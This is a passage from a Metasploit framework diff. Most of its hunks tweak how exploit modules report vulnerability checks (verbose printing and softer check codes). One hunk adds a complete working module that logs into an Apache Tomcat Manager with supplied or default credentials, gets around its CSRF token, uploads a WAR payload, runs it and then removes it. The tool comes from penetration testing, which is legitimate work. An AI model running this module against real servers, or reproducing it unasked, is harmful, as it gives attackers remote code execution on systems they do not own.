if res.body =~ /<p><img alt="Company logo" title="logo" style="width: 115px; height: 53px;"\s+src="[^"]+" \/>\s+<br \/>TestLink 1\.9\.3/
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
end
end
end
@ -81,9 +81,10 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Detected if res and res.body =~ /TestLink project <a href="http:\/\/testlink\.sourceforge\.net\/docs\/testLink\.php">Home<\/a><br \/>/
return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{peer} - Connection failed")
end
vprint_error("#{peer} - Connection failed")
return Exploit::CheckCode::Unknown
end
return Exploit::CheckCode::Safe
end

6
modules/exploits/multi/http/tomcat_mgr_deploy.rb
View File

@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
disconnect
return CheckCode::Unknown if res.nil?
if (res.code.between?(400, 499))
print_error("Server rejected the credentials")
vprint_error("Server rejected the credentials")
return CheckCode::Unknown
end
@ -128,8 +128,8 @@ class Metasploit3 < Msf::Exploit::Remote
:active => true
)
print_status("Target is #{detect_platform(res.body)} #{detect_arch(res.body)}")
return CheckCode::Vulnerable
vprint_status("Target is #{detect_platform(res.body)} #{detect_arch(res.body)}")
return CheckCode::Appears
end
def auto_target

426
modules/exploits/multi/http/tomcat_mgr_upload.rb Normal file
View File

@ -0,0 +1,426 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
CSRF_VAR = 'CSRF_NONCE='
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',
'Description' => %q{
This module can be used to execute a payload on Apache Tomcat servers that
have an exposed "manager" application. The payload is uploaded as a WAR archive
containing a jsp application using a POST request against the /manager/html/upload
component.
NOTE: The compatible payload sets vary based on the selected target. For
example, you must select the Windows target to use native Windows payloads.
},
'Author' => 'rangercha',
'License' => MSF_LICENSE,
'References' =>
[
# This is based on jduck's tomcat_mgr_deploy.
# the tomcat_mgr_deploy o longer works for current versions of tomcat due to
# CSRF protection tokens. Also PUT requests against the /manager/html/deploy
# aren't allowed anymore.
# There is no single vulnerability associated with deployment functionality.
# Instead, the focus has been on insecure/blank/hardcoded default passwords.
# The following references refer to HP Operations Manager
['CVE', '2009-3843'],
['OSVDB', '60317'],
['CVE', '2009-4189'],
['OSVDB', '60670'],
# HP Operations Dashboard
['CVE', '2009-4188'],
# IBM Cognos Express Default user/pass
['BID', '38084'],
['CVE', '2010-0557'],
['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'],
# IBM Rational Quality Manager and Test Lab Manager
['CVE', '2010-4094'],
['ZDI', '10-214'],
# 'admin' password is blank in default Windows installer
['CVE', '2009-3548'],
['OSVDB', '60176'],
['BID', '36954'],
# tomcat docs
['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html']
],
'Platform' => %w{ java linux win }, # others?
'Targets' =>
[
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
}
],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 09 2009'))
register_options(
[
OptString.new('USERNAME', [false, 'The username to authenticate as']),
OptString.new('PASSWORD', [false, 'The password for the specified username']),
# /cognos_express/manager/ for Cognos Express (19300)
OptString.new('TARGETURI', [true, "The URI path of the manager app (/html/upload and /undeploy will be used)", '/manager'])
], self.class)
end
def check
res = query_manager
disconnect
return CheckCode::Unknown if res.nil?
if res.code.between?(400, 499)
vprint_error("#{peer} - Server rejected the credentials")
return CheckCode::Unknown
end
return CheckCode::Safe unless res.code == 200
# if res.code == 200
# there should be access to the Tomcat Manager and to the status page
res = query_status
return CheckCode::Unknown unless res
plat = detect_platform(res.body)
arch = detect_arch(res.body)
return CheckCode::Unknown unless plat and arch
vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture")
report_auth_info(
:host => rhost,
:port => rport,
:sname => (ssl ? "https" : "http"),
:user => datastore['USERNAME'],
:pass => datastore['PASSWORD'],
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true
)
return CheckCode::Appears
end
def exploit
@app_base = rand_text_alphanumeric(4 + rand(32 - 4))
@jsp_name = rand_text_alphanumeric(4 + rand(32 - 4))
#
# Find the session ID and the CSRF token
#
print_status("#{peer} - Retrieving session ID and CSRF token...")
unless access_manager?
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
end
#
# Upload Payload
#
print_status("#{peer} - Uploading and deploying #{@app_base}...")
if upload_payload
report_auth_info(
:host => rhost,
:port => rport,
:sname => (ssl ? "https" : "http"),
:user => datastore['USERNAME'],
:pass => datastore['PASSWORD'],
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true
)
else
fail_with(Failure::Unknown, "Upload failed")
end
#
# Execute Payload
#
print_status("#{peer} - Executing #{@app_base}...")
unless execute_payload
fail_with(Failure::Unknown, "Failed to execute the payload")
end
#
# Get the new CSRF token & session id
#
unless access_manager?
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
end
#
# Delete the deployed payload
#
print_status("#{peer} - Undeploying #{@app_base} ...")
unless undeploy_app
print_warning("#{peer} - Failed to undeploy #{@app_base}...")
end
end
def query_status
path = normalize_uri(target_uri.path.to_s, 'status')
res = send_request_raw('uri' => path)
unless res and res.code == 200
vprint_error("Failed: Error requesting #{path}")
return nil
end
return res
end
def query_manager
path = normalize_uri(target_uri.path.to_s, '/html')
res = send_request_raw('uri' => path)
return res
end
def vars_get
vars = {}
unless @csrf_token.nil?
vars = {
"path" => @app_base,
"org.apache.catalina.filters.CSRF_NONCE" => @csrf_token
}
end
return vars
end
def detect_platform(body)
return nil if body.blank?
i=0
body.each_line do |ln|
ln.chomp!
i = 1 if ln =~ /OS Name/
if i == 9 or i == 11
if ln.include? "Windows"
return 'win'
elsif ln.include? "Linux"
return 'linux'
elsif i==11
return 'unknown'
end
end
i = i+1 if i > 0
end
end
def detect_arch(body)
return nil if body.blank?
i=0
body.each_line do |ln|
ln.chomp!
i = 1 if ln =~ /OS Architecture/
if i==9 or i==11
if ln.include? 'x86'
return ARCH_X86
elsif ln.include? 'i386'
return ARCH_X86
elsif ln.include? 'i686'
return ARCH_X86
elsif ln.include? 'x86_64'
return ARCH_X86
elsif ln.include? 'amd64'
return ARCH_X86
elsif i==11
return 'unknown'
end
end
i = i + 1 if i > 0
end
end
def find_csrf(res = nil)
return "" if res.blank?
vprint_status("#{peer} - Finding CSRF token...")
body = res.body
body.each_line do |ln|
ln.chomp!
csrf_nonce = ln.index(CSRF_VAR)
next if csrf_nonce.nil?
token = ln[csrf_nonce + CSRF_VAR.length, 32]
return token
end
return ""
end
def generate_multipart_msg(boundary, data)
# Rex::MIME::Message is breaking the binary upload when trying to
# enforce CRLF for SMTP compatibility
war_multipart = "-----------------------------"
war_multipart << boundary
war_multipart << "\r\nContent-Disposition: form-data; name=\"deployWar\"; filename=\""
war_multipart << @app_base
war_multipart << ".war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
war_multipart << data
war_multipart << "\r\n-----------------------------"
war_multipart << boundary
war_multipart << "--\r\n"
end
def war_payload
payload.encoded_war({
:app_name => @app_base,
:jsp_name => @jsp_name,
:arch => target.arch,
:platform => target.platform
}).to_s
end
def send_war_payload(url, war)
boundary_identifier = rand_text_numeric(28)
res = send_request_cgi({
'uri' => url,
'method' => 'POST',
'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier,
'user' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'cookie' => @session_id,
'vars_get' => vars_get,
'data' => generate_multipart_msg(boundary_identifier, war),
})
return res
end
def send_request_undeploy(url)
res = send_request_cgi({
'uri' => url,
'vars_get' => vars_get,
'method' => 'POST',
'user' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'cookie' => @session_id
})
return res
end
def access_manager?
res = query_manager
return false unless res and res.code == 200
@session_id = res.get_cookies
@csrf_token = find_csrf(res)
return true
end
def upload_payload
war = war_payload
upload_path = normalize_uri(target_uri.path.to_s, "html", "upload")
vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...")
res = send_war_payload(upload_path, war)
return parse_upload_response(res)
end
def parse_upload_response(res)
unless res
vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]")
return false
end
if res.code < 200 or res.code >= 300
vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]")
return false
end
return true
end
def execute_payload
jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp")
vprint_status("#{peer} - Executing #{jsp_path}...")
res = send_request_cgi({
'uri' => jsp_path,
'method' => 'GET'
})
return parse_execute_response(res)
end
def parse_execute_response(res)
unless res
vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]")
return false
end
if res and (res.code < 200 or res.code >= 300)
vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]")
return false
end
return true
end
def undeploy_app
undeploy_url = normalize_uri(target_uri.path.to_s, "html", "undeploy")
res = send_request_undeploy(undeploy_url)
unless res
vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]")
return false
end
if res and (res.code < 200 or res.code >= 300)
vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]")
return false
end
return true
end
end

2
modules/exploits/multi/http/traq_plugin_exec.rb
View File

@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 25)
if (res and res.body =~ /Powered by Traq 2.[0-3]/ )
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end

2
modules/exploits/multi/http/uptime_file_upload.rb
View File

@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Unknown
return Exploit::CheckCode::Safe
end

12
modules/exploits/multi/http/vtiger_php_exec.rb
View File

@ -57,26 +57,26 @@ class Metasploit3 < Msf::Exploit::Remote
begin
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/index.php') })
rescue
print_error("Unable to access the index.php file")
vprint_error("Unable to access the index.php file")
return CheckCode::Unknown
end
if res and res.code != 200
print_error("Error accessing the index.php file")
vprint_error("Error accessing the index.php file")
return CheckCode::Unknown
end
if res.body =~ /<div class="poweredBy">Powered by vtiger CRM - (.*)<\/div>/i
print_status("vTiger CRM version: " + $1)
vprint_status("vTiger CRM version: " + $1)
case $1
when '5.4.0', '5.3.0'
return CheckCode::Vulnerable
return CheckCode::Appears
else
return CheckCode::Safe
return CheckCode::Detected
end
end
return CheckCode::Unknown
return CheckCode::Safe
end
def exploit

2
modules/exploits/multi/http/webpagetest_upload_exec.rb
View File

@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and
res2 and res2.code == 200
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe

6
modules/exploits/multi/http/zabbix_script_exec.rb
View File

@ -60,14 +60,14 @@ class Metasploit4 < Msf::Exploit::Remote
})
if !init or init.code != 200
print_error("Could not connect to server")
vprint_error("Could not connect to server")
return Exploit::CheckCode::Unknown
end
if init.body =~ /Zabbix (2\.0\.(\d)) Copyright/
if $1 >= "2.0.0" and $1 <= "2.0.8"
print_good("Version #{$1} is vulnerable.")
return Exploit::CheckCode::Vulnerable
vprint_good("Version #{$1} is vulnerable.")
return Exploit::CheckCode::Appears
end
end
return Exploit::CheckCode::Safe

4
modules/exploits/multi/misc/openview_omniback_exec.rb
View File

@ -83,12 +83,12 @@ class Metasploit3 < Msf::Exploit::Remote
disconnect
if !(res and res.length > 0)
print_status("The remote service did not reply to our request")
vprint_status("The remote service did not reply to our request")
return Exploit::CheckCode::Safe
end
if (res =~ /passwd|group|resolv/)
print_status("The remote service is exploitable")
vprint_status("The remote service is exploitable")
return Exploit::CheckCode::Vulnerable
end

4
modules/exploits/multi/misc/pbot_exec.rb
View File

@ -72,13 +72,13 @@ class Metasploit3 < Msf::Exploit::Remote
response = register(sock)
if response =~ /463/ or response =~ /464/
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return Exploit::CheckCode::Unknown
end
response = join(sock)
if not response =~ /353/ and not response =~ /366/
print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
return Exploit::CheckCode::Unknown
end
response = pbot_login(sock)

2
modules/exploits/multi/misc/ra1nx_pubcall_exec.rb
View File

@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
response = register(sock)
if response =~ /463/ or response =~ /464/
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return Exploit::CheckCode::Unknown
end

20
modules/exploits/multi/php/php_unserialize_zval_cookie.rb
View File

@ -202,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
print_status("Checking for a vulnerable PHP version...")
vprint_status("Checking for a vulnerable PHP version...")
#
# Pick the URI and Cookie name
@ -226,14 +226,14 @@ class Metasploit3 < Msf::Exploit::Remote
php_bug = false
if (not res)
print_status("No response from the server")
return Exploit::CheckCode::Safe
vprint_status("No response from the server")
return Exploit::CheckCode::Unknown # User should try again
end
http_fingerprint({ :response => res }) # check method
if (res.code != 200)
print_status("The server returned #{res.code} #{res.message}")
vprint_status("The server returned #{res.code} #{res.message}")
return Exploit::CheckCode::Safe
end
@ -246,29 +246,29 @@ class Metasploit3 < Msf::Exploit::Remote
php_ver = php_raw.split('.')
if (php_ver[0].to_i == 4 and php_ver[1] and php_ver[2] and php_ver[1].to_i < 5)
print_status("The server runs a vulnerable version of PHP (#{php_raw})")
vprint_status("The server runs a vulnerable version of PHP (#{php_raw})")
php_bug = true
else
print_status("The server runs a non-vulnerable version of PHP (#{php_raw})")
vprint_status("The server runs a non-vulnerable version of PHP (#{php_raw})")
return Exploit::CheckCode::Safe
end
end
# Detect the phpBB cookie name
if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/)
print_status("The server may require a cookie name of '#{$1}_data'")
vprint_status("The server may require a cookie name of '#{$1}_data'")
end
if(target and target['Signature'])
if (res.body and res.body.match(target['Signature']))
print_status("Detected target #{target.name}")
vprint_status("Detected target #{target.name}")
else
print_status("Did not detect target #{target.name}")
vprint_status("Did not detect target #{target.name}")
end
end
return php_bug ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Appears
return php_bug ? Exploit::CheckCode::Appears : Exploit::CheckCode::Detected
end

2
modules/exploits/multi/realserver/describe.rb
View File

@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
info = http_fingerprint({ :response => res }) # check method / Custom server check
if res and res['Server']
print_status("Found RTSP: #{res['Server']}")
vprint_status("Found RTSP: #{res['Server']}")
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe

2
modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
View File

@ -93,7 +93,7 @@ class Metasploit4 < Msf::Exploit::Remote
end
if res and res.code == 200 and res.headers['Server'] =~ /gSOAP/ and res.body =~ /OSExecuteResponse/
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
elsif res and res.code == 500 and (res.body =~ /Invalid Credentials/ or res.body =~ /Permission denied/)
return Exploit::CheckCode::Detected
elsif res and res.headers['Server'] =~ /gSOAP/

3
modules/exploits/multi/svn/svnserve_date.rb
View File

@ -85,9 +85,6 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def check
end
def brute_exploit(addresses)
connect

8
modules/exploits/osx/arkeia/type77.rb
View File

@ -61,18 +61,18 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe
end
print_status("Arkeia Server Information:")
vprint_status("Arkeia Server Information:")
info.each_pair { |k,v|
print_status(" #{k + (" " * (30-k.length))} = #{v}")
vprint_status(" #{k + (" " * (30-k.length))} = #{v}")
}
if (info['System'] !~ /Darwin/)
print_status("This module only supports Mac OS X targets")
vprint_status("This module only supports Mac OS X targets")
return Exploit::CheckCode::Detected
end
if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
return Exploit::CheckCode::Vulnerable
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe

Some files were not shown because too many files have changed in this diff Show More